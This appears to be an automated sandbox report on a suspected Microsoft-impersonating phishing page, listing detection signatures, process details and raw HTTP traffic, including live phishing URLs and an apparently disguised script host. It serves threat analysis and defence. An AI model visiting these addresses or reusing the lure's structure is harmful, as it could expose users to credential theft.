Edit tour

Windows Analysis Report
https://remotex.scienceexperimentlab.de/3yAKy

Overview

General Information

Sample URL:https://remotex.scienceexperimentlab.de/3yAKy
Analysis ID:1641708
Infos:

Detection

Score:52
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Phishing site or detected (based on various text indicators)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML title does not match URL
Invalid T&C link found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 7000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 1064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2000,i,9432825401249524070,8579183881901806277,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 5440 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://remotex.scienceexperimentlab.de/3yAKy" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://remotex.scienceexperimentlab.de/3yAKy/Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'remotex.scienceexperimentlab.de' does not match the legitimate domain for Microsoft., The domain 'scienceexperimentlab.de' is unrelated to Microsoft and appears suspicious., The use of a subdomain 'remotex' and the main domain 'scienceexperimentlab.de' suggests a potential phishing attempt., The presence of an input field for 'Enter email' is common in phishing sites attempting to harvest credentials. DOM: 0.5.pages.csv
Source: Chrome DOM: 0.3OCR Text: Microsoft Secure browsing mode engaging. Verifying... CLOUDFLARE Ten-rs To proceed, Microsoft has to ensure that your connection is safe and secure
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: Number of links: 0
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: Total embedded image size: 123322
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: Title: Sharing Link Validation does not match URL
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: Invalid link: Privacy & Cookies
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: Invalid link: Privacy & Cookies
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: Invalid link: Privacy & Cookies
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: <input type="password" .../> found
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: No favicon
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: No favicon
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: No favicon
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: No favicon
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: No favicon
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: No favicon
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: No <meta name="author".. found
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: No <meta name="author".. found
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: No <meta name="author".. found
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: No <meta name="copyright".. found
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: No <meta name="copyright".. found
Source: https://remotex.scienceexperimentlab.de/3yAKy/HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownHTTPS traffic detected: 172.67.182.204:443 -> 192.168.2.16:49703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.182.204:443 -> 192.168.2.16:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.181.228:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.128.193.190:443 -> 192.168.2.16:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.32.43:443 -> 192.168.2.16:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.182.204:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 8MB later: 40MB
Source: global trafficTCP traffic: 192.168.2.16:49712 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49712 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49712 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49712 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49712 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49712 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49712 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49712 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49712 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.181.227
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: global trafficHTTP traffic detected: GET /3yAKy HTTP/1.1Host: remotex.scienceexperimentlab.deConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /3yAKy/ HTTP/1.1Host: remotex.scienceexperimentlab.deConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://remotex.scienceexperimentlab.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1Host: mailmeteor.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://remotex.scienceexperimentlab.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://remotex.scienceexperimentlab.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1Host: mailmeteor.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rt1pg/0x4AAAAAABA4JrY35lEgjaNZ/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://remotex.scienceexperimentlab.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=92247042bc5f72a7&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rt1pg/0x4AAAAAABA4JrY35lEgjaNZ/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rt1pg/0x4AAAAAABA4JrY35lEgjaNZ/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: remotex.scienceexperimentlab.deConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://remotex.scienceexperimentlab.de/3yAKy/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ubds6d1946prgq7b9qkdoe1r69
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1992192414:1742294144:lBKl-GQ87cx6YdPw8ANGt4nMRGVnHP2LBHmIvaQS3Vo/92247042bc5f72a7/.KZnVzwhwazmF3tFIkTicSNqBhEGbA8ENZ35afrR3lI-1742297851-1.1.1.1-QVqVfU3PcUbuxSRwC3ltnkt_OZK2e5jKlzcDFhf0iAztog_0If3XuxHsHFzKbXs8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/92247042bc5f72a7/1742297853200/e2714cc8792d701b2bbfcba2b5b219c48ad5a1f9df6267faca1c1ae07df6f785/-1qnsaGXyUNm7de HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rt1pg/0x4AAAAAABA4JrY35lEgjaNZ/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/92247042bc5f72a7/1742297853202/qRvSdCt_a7T5ram HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rt1pg/0x4AAAAAABA4JrY35lEgjaNZ/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/92247042bc5f72a7/1742297853202/qRvSdCt_a7T5ram HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1992192414:1742294144:lBKl-GQ87cx6YdPw8ANGt4nMRGVnHP2LBHmIvaQS3Vo/92247042bc5f72a7/.KZnVzwhwazmF3tFIkTicSNqBhEGbA8ENZ35afrR3lI-1742297851-1.1.1.1-QVqVfU3PcUbuxSRwC3ltnkt_OZK2e5jKlzcDFhf0iAztog_0If3XuxHsHFzKbXs8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1992192414:1742294144:lBKl-GQ87cx6YdPw8ANGt4nMRGVnHP2LBHmIvaQS3Vo/92247042bc5f72a7/.KZnVzwhwazmF3tFIkTicSNqBhEGbA8ENZ35afrR3lI-1742297851-1.1.1.1-QVqVfU3PcUbuxSRwC3ltnkt_OZK2e5jKlzcDFhf0iAztog_0If3XuxHsHFzKbXs8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://remotex.scienceexperimentlab.desec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://remotex.scienceexperimentlab.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://remotex.scienceexperimentlab.desec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://remotex.scienceexperimentlab.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://remotex.scienceexperimentlab.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://remotex.scienceexperimentlab.desec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://remotex.scienceexperimentlab.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: 6733994123-1317754460.cos.ap-bangkok.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://remotex.scienceexperimentlab.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: waub.scienceexperimentlab.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /3yAKy/1.png HTTP/1.1Host: remotex.scienceexperimentlab.deConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://remotex.scienceexperimentlab.de/3yAKy/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ubds6d1946prgq7b9qkdoe1r69
